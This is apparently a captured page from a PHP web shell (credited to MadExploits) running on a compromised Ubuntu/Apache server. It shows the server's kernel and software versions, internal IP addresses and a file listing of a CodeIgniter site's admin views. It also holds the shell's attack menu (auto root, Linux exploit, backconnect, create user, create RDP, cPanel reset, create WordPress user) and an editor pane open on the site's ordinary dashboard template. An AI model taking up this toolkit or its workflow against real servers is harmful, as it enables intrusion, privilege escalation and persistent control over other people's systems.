Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
admin /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
ablog-content.php
15.55
KB
-rwxr-x--x
ablog-list.php
4.11
KB
-rwxr-x--x
ablog.php
9.8
KB
-rwxr-x--x
cat-content.php
14.67
KB
-rwxr-x--x
cat-list.php
4.41
KB
-rwxr-x--x
cat.php
11.79
KB
-rwxr-x--x
corse-content.php
24.91
KB
-rwxr-x--x
corse-list.php
5.01
KB
-rwxr-x--x
corse.php
11.97
KB
-rwxr-x--x
dashboard-content.php
7.49
KB
-rwxr-x--x
dashboard.php
4.9
KB
-rwxr-x--x
evnt-content.php
22.8
KB
-rwxr-x--x
evnt-list.php
5.78
KB
-rwxr-x--x
evnt.php
13.14
KB
-rwxr-x--x
item-content.php
29.69
KB
-rwxr-x--x
item-list.php
5.48
KB
-rwxr-x--x
item.php
14.06
KB
-rwxr-x--x
jobc-content.php
24.4
KB
-rwxr-x--x
jobc-list.php
5
KB
-rwxr-x--x
jobc.php
11.97
KB
-rwxr-x--x
mdc-content.php
14.59
KB
-rwxr-x--x
mdc-list.php
5.61
KB
-rwxr-x--x
mdc.php
10.77
KB
-rwxr-x--x
mems-content.php
16.55
KB
-rwxr-x--x
mems-list.php
4.44
KB
-rwxr-x--x
mems.php
10.73
KB
-rwxr-x--x
pages-content.php
11.04
KB
-rwxr-x--x
pages-list.php
2.57
KB
-rwxr-x--x
pages.php
10.41
KB
-rwxr-x--x
proj-content.php
24.42
KB
-rwxr-x--x
proj-list.php
5.85
KB
-rwxr-x--x
proj.php
12.63
KB
-rwxr-x--x
projt-content.php
5.66
KB
-rwxr-x--x
projt-list.php
3.84
KB
-rwxr-x--x
projt.php
8.67
KB
-rwxr-x--x
puba-content.php
5.66
KB
-rwxr-x--x
puba-list.php
3.87
KB
-rwxr-x--x
puba.php
8.67
KB
-rwxr-x--x
publ-content.php
27.35
KB
-rwxr-x--x
publ-list.php
6.23
KB
-rwxr-x--x
publ.php
12.66
KB
-rwxr-x--x
pubv-content.php
5.66
KB
-rwxr-x--x
pubv-list.php
3.87
KB
-rwxr-x--x
pubv.php
8.67
KB
-rwxr-x--x
udig-content.php
5.62
KB
-rwxr-x--x
udig-list.php
3.59
KB
-rwxr-x--x
udig.php
8.67
KB
-rwxr-x--x
user-content.php
32.34
KB
-rwxr-x--x
user-list.php
5.77
KB
-rwxr-x--x
user.php
13.49
KB
-rwxr-x--x
wrks-content.php
24.38
KB
-rwxr-x--x
wrks-list.php
5
KB
-rwxr-x--x
wrks.php
11.84
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dashboard.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?> <!doctype html> <html class="fixed"> <head> <!-- Basic --> <meta charset="UTF-8"> <meta name="keywords" content="<?=$this->lang->line('SITE_KEYWORDS');?>" /> <meta name="description" content="<?=$this->lang->line('SITE_DESC');?>"> <meta name="author" content="<?=$this->lang->line('TECH_PARTNER');?>"> <title><?=$this->lang->line('SITE_TITLE');?></title> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <!-- Web Fonts --> <link href="http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700,800|Shadows+Into+Light" rel="stylesheet" type="text/css"> <!-- Vendor CSS --> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>bootstrap/css/bootstrap.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>font-awesome/css/font-awesome.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>magnific-popup/magnific-popup.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>bootstrap-datepicker/css/datepicker3.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>pnotify/pnotify.custom.css" /> <!-- Specific Page Vendor CSS --> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>morris/morris.css" /> <!-- Theme CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>theme.css" /> <!-- Skin CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>skins/default.css" /> <!-- Theme Custom CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>theme-custom.css"> <!-- Head Libs --> <script src="<?=$this->config->item('vendor_url');?>modernizr/modernizr.js"></script> <script src="<?=$this->config->item('jvs_url');?>jquery.min.js"></script> <script src="<?=$this->config->item('vendor_url');?>raphael/raphael.js"></script> <script src="<?=$this->config->item('vendor_url');?>morris/morris.js"></script> </head> <body> <section class="body"> <!-- start: header --> <header class="header"><?php $this->load->view($DIR['TOP']);?></header> <!-- end: header --> <div class="inner-wrapper"> <!-- start: sidebar --> <aside id="sidebar-left" class="sidebar-left"><?php $this->load->view($DIR['LEFT']); ?></aside> <!-- end: sidebar --> <section role="main" class="content-body"> <header class="page-header"><?php $this->load->view($DIR['HEAD']);?></header> <!-- start: page --> <?php $this->load->view($DIR['CONTENT']); ?> <!-- end: page --> </section> </div> <aside id="sidebar-right" class="sidebar-right"><?php $this->load->view($DIR['RGHT']);?></aside> </section> <!-- Vendor --> <script src="<?=$this->config->item('vendor_url');?>jquery/jquery.js"></script> <script src="<?=$this->config->item('vendor_url');?>jquery-browser-mobile/jquery.browser.mobile.js"></script> <script src="<?=$this->config->item('vendor_url');?>bootstrap/js/bootstrap.js"></script> <script src="<?=$this->config->item('vendor_url');?>nanoscroller/nanoscroller.js"></script> <script src="<?=$this->config->item('vendor_url');?>bootstrap-datepicker/js/bootstrap-datepicker.js"></script> <!-- Specific Page Vendor --> <script src="<?=$this->config->item('vendor_url');?>pnotify/pnotify.custom.js"></script> <!-- Specific Page Vendor --> <script src="<?=$this->config->item('vendor_url');?>flot/jquery.flot.js"></script> <script src="<?=$this->config->item('vendor_url');?>flot/jquery.flot.pie.js"></script> <!-- Theme Base, Components and Settings --> <script src="<?=$this->config->item('jvs_url');?>theme.js"></script> <!-- Theme Custom --> <script src="<?=$this->config->item('jvs_url');?>theme.custom.js"></script> <!-- Theme Initialization Files --> <script src="<?=$this->config->item('jvs_url');?>theme.init.js"></script> <!-- Examples --> <script src="<?=$this->config->item('jvs_url');?>ui-elements/examples.pic.charts.js"></script> <script src="<?=$this->config->item('jvs_url');?>ui-elements/examples.charts.js"></script> <?php if($this->session->flashdata(STATUS_MSG) != '') { ?> <script> (function( $ ) { 'use strict'; var stack_bottomright = {"dir1": "up", "dir2": "left", "firstpos1": 15, "firstpos2": 15}; var notice = new PNotify({ title: 'Dashboard', text: '<?=$this->session->flashdata(STATUS_MSG);?>', type: '<?=$this->session->flashdata(STATUS_TYPE);?>', addclass: 'stack-bottomright', stack: {"dir1": "up", "dir2": "left", "firstpos1": 15, "firstpos2": 15} }); }).apply( this, [ jQuery ]); </script> <?php $this->session->unset_userdata(STATUS_MSG); } ?> </body> </html>
Close